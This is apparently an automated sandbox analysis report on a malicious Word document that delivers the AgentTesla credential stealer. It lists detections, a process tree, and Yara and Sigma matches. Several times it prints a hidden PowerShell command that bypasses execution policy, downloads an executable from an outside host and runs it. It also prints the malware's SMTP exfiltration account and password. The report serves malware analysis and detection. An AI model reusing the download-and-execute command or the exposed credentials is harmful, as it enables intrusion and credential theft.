
Windows Analysis Report 478644.doc

Overview

General Information

Sample Name: 478644.doc
Analysis ID: 553100
MD5: c0f8f2fc481e9be7141d84b401edf1f7
SHA1: ab1dbe841b083ea886c9023307c0527f7bfbfff3
SHA256: 4b0d21f58347c62f76445c6aa17a21dd00970f235734a1d1db4a40ee5a8b7c45
Tags: doc

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Yara detected AgentTesla
Sigma detected: Powershell download and execute file
Document exploit detected (creates forbidden files)
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Yara detected Costura Assembly Loader
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Document contains a stream with embedded javascript code
Injects a PE file into a foreign processes
Powershell drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Found suspicious RTF objects
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Sigma detected: Verclsid.exe Runs COM Object
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2724 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 2904 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 1308 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 292 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • okcff.exe (PID: 2656 cmdline: "C:\Users\user\AppData\Roaming\okcff.exe" MD5: E9416A322E9A796D45588BC4FB04CD45)
        • cmd.exe (PID: 2028 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1972 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2104 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2060 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 1864 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2100 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 1892 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2780 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2712 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2228 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 448 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2632 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2792 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1188 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 836 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1308 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2424 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1204 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • okcff.exe (PID: 2176 cmdline: C:\Users\user\AppData\Roaming\okcff.exe MD5: E9416A322E9A796D45588BC4FB04CD45)
    • verclsid.exe (PID: 2432 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2652 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "hisgraceinme@yandex.com", "Password": "newyear2022", "Host": "smtp.yandex.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security | -
00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security | -
00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth | matched strings listed below
  • 0x325b:$sb1: -W Hidden
  • 0x324b:$sc1: -NoP
  • 0x3255:$sd1: -NonI
  • 0x3265:$se3: -ExecutionPolicy bypass
  • 0x3250:$sf1: -sta

Unpacked PEs

Source | Rule | Description | Author | Strings
41.0.okcff.exe.400000.9.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
41.0.okcff.exe.400000.9.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security | -
41.0.okcff.exe.400000.13.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
41.0.okcff.exe.400000.13.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security | -
9.2.okcff.exe.3605ff0.7.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -

Sigma Overview

System Summary:

Sigma detected: Change PowerShell Policies to a Unsecure Level
Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
Sigma detected: PowerShell DownloadFile
Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
Sigma detected: Verclsid.exe Runs COM Object
Source: Process startedAuthor: Victor Sergeev, oscd.community: Data: Command: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046}